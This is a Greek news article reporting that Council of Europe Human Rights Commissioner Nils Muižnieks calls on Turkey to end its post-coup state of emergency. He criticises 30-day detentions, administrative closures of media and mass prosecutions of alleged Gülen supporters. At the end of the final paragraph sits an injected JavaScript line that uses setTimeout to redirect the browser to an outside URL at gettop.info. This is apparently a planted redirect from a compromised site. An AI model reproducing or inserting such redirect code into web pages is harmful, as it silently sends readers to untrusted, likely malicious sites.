Συμβούλιο της Ευρώπης: Η Τουρκία πρέπει να τερματίσει την κατάσταση εκτάκτου ανάγκης

0
6

 

Να τερματίσει «το συντομότερο δυνατόν» την κατάσταση εκτάκτου ανάγκης η οποία επιβλήθηκε μετά το αποτυχημένο στρατιωτικό πραξικόπημα καλεί την Τουρκία ο Επίτροπος Ανθρωπίνων Δικαιωμάτων του Συμβουλίου της Ευρώπης Νιλς Μούιζνιεκς.

Ο Επίτροπος ανησυχεί ιδιαίτερα για την δυνατότητα προφυλάκισης οποιουδήποτε προσώπου για 30 ημέρες και κρίνει «ιδιαίτερα επείγον να τερματιστεί αμέσως το κλείσιμο, βάσει μιας απλής διοικητικής απόφασης, εφημερίδων, τηλεοπτικών δικτύων, ενώσεων ή επιχειρήσεων και την υπαγωγή των πόρων τους στο δημόσιο ταμείο».

Κατήγγειλε επίσης τον μαζικό και αδιάκριτο χαρακτήρα των διώξεων που έχουν κινηθεί εναντίον προσώπων που βαρύνουν υποψίες ότι πρόσκεινται στο κίνημα του ιεροκήρυκα Φετουλάχ Γκιουλέν, τον οποίο κατηγορεί η τουρκική κυβέρνηση ότι υπήρξε ο εγκέφαλος του πραξικοπήματος.

Την 3η Οκτωβρίου η τουρκική κυβέρνηση αποφάσισε να παραταθεί για άλλους τρεις μήνες η κατάσταση έκτακτης ανάγκης η οποία επιβλήθηκε μετά την απόπειρα πραξικοπήματος της 15ης Ιουλίου, παρά τις διαμαρτυρίες της αντιπολίτευσης, η οποία κατηγορεί το ισλαμοσυντηρητικό κυβερνών κόμμα ότι επωφελείται από την ευκαιρία που του παρουσιάστηκε για να φιμώσει ή να απαλλαγεί από τους επικριτές του.

Μετά την 15η Ιουλίου οι τουρκικές αρχές εξαπέλυσαν διωγμούς δίχως προηγούμενο που δεν έχουν αφήσει ανεπηρέαστο κανέναν τομέα της κοινωνίας, από την εκπαίδευση και τον Τύπο ως τις ένοπλες δυνάμεις και το δικαστικό σώμα. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here